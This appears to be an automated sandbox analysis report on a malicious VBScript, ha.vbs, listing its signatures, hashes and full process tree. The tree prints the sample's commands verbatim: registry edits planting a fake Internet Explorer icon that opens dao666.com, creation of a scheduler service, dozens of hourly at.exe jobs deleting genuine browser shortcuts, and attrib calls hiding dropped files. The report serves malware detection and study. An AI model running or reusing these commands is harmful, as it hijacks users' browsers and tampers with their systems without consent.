Analysis
-
max time kernel
122s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
26/12/2023, 11:27
General
-
Target
ha.vbs
-
Size
1KB
-
MD5
97b8dddd4361596cdeb6851a0639d834
-
SHA1
7f35a8018d53777c449b9703a867c0f41b542e62
-
SHA256
fa554b0be47bc18d0992bf700e8495ad29237d88413faac60cc1850a51dedb80
-
SHA512
d3103e2bd9c5e272ae7f80e27c62ca70ee06adb6b6c85b2c60f34e781ed54f140caa1cb4f0787256e4e66cd47dd4047cee0bb50a13bac581a05f47d904009f4b
Score
8/10
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Deletes itself 1 IoCs
-
Registers COM server for autorun 1 TTPs 6 IoCs
-
Drops file in Program Files directory 21 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 44 IoCs
-
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ha.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?cn2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?cn3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2132 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\tool.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\runonce.cmd2⤵
-
C:\Windows\system32\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet start "Task Scheduler"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start "Task Scheduler"4⤵
-
-
-
C:\Windows\system32\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd2⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\Windows\360SE.vbs"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\tool.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\360.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\361.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\360.cmd2⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\cpa.cmd2⤵
- Deletes itself
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del .\runonce.cmd2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567240c407312315393794e9b65d1e8e5
SHA1810b252670834678fdaa057b39e07985a029be7a
SHA2560a29a7d11891968f5a4a6eb615e87a428d5e93c9a48908c7a1de7cf5a40acf22
SHA512897bfb0b8b9ca3a315ff72b9c937aba50ddb88dd28ce3d8f156ccb01d008e566260e317364966fc3fe59a6f78017ad3924f32dd6d4b4a170550edc55b62bd3f2
-
Filesize
567B
MD5feb810eaa38eb0890ad2034d322e4c79
SHA1a7c7ddd0bd405b949ddbffed364269d145ee78e4
SHA256e346f4ed81e3e7974c4a9978789fc08737abc4c7318f31d747b1ad23ce5bf800
SHA512f96b5e8129ab8fd4703a2e4bddf4245e9c4a64a8d69663f755386021cb8fd34a75bd0fa53b4579145bf50be2948d9ae5d0f4bdb556ae73b4cc85e6a2130f5ab9
-
Filesize
3KB
MD5d7eece295819ac643894e11ec290fc16
SHA1eaf976563ab1d54ddbb538846f21d80663c0482b
SHA25600057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef
SHA51261602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036
-
Filesize
344B
MD513ba8cf14bc56c5eb42a47c4c7810e8f
SHA12f894c530fb578badef26c1d72eb0c6f6d172b7a
SHA256024e928d114ead53758c605d682cae72a0b18b534438f7cc2dd4232e58047d68
SHA512ef535fed8a88569b40c028db28fac8764e19e0cad5b271e411bd54c581cc4f761738841205469960b3f147df970673f6e8a62e22af1856ae56f41ead8892a372
-
Filesize
344B
MD5ddc25af6b6f72deedd0f9e5eb0f3c745
SHA13848a3941ed24a3faf372a1499492c3ec103b7bd
SHA256b61947e7962038a53333e99b9957855b460bec9fd84e7fdb61d80f544bce3db8
SHA5124b8c0a5e4d5f21940477652ddb6b167aee75b845989c4121958df25fe100e70a81b12628a14efef3c43c194e00b40570c1a6439ee10372309fe46678c4ac2bde
-
Filesize
344B
MD5cee6b4b5aabd933dbb6804488b7b5655
SHA1b9688a72ddbf3c5ad3aab52a716ea5badf6a8c54
SHA256be43ca2a80506cfd915952e9ed2e254c353d3702bc5c21b0c0057f452b6c2186
SHA512cb84a4ae2babb1e8c02df33dd9e723fdc1f608e7338efd4c1d963b859e2061af7810ee7ebc7b4bb3023be354949b372b1877e763b295f6009d652c9767732dbe
-
Filesize
344B
MD5fd7030164599d7b7cae6142e05a5dc4c
SHA1b81b63024b661f4ed60f97e3b21b7f7ad59dda1c
SHA2567c5647404507748fb0b3212d6c027f8166e4dc86e57c85acdeab34994b38b8aa
